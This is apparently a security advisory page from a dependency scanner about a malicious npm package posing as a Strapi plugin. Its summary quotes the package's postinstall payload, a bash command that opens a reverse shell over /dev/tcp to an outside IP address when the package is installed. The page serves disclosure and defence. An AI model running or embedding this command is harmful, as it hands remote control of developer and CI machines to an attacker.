Logo
npm

strapi-plugin-revs01-meeb322k@3.6.8

Vulnerability report · Last retrieved from osv.dev September 16, 2026 at 3:27 AM UTC

Malicious

OSV ID

MAL-2026-16185

Ecosystem

npm

Summary

strapi-plugin-revs01-meeb322k@3.6.8 ships a postinstall lifecycle script (scripts.postinstall = node postinstall.js) that spawns /bin/bash via child_process.exec and runs bash -i > /dev/tcp/14.225.210.85/443 0>&1, opening an interactive reverse shell from the installer's host to 14.225.210.85 on TCP/443. The script also drops a marker file under /tmp. The behavior triggers automatically on npm install, granting full remote code execution on the installing developer or CI machine. The package self-describes as a reverse shell payload for Strapi.

Source: amazon-inspector (981b426b3809283ad517caf0032d403db2c479faa3c717620151cbfabcc9b81c)

Protect your entire dependency tree

Scan your lock files automatically on every PR. Block malicious packages before they reach production.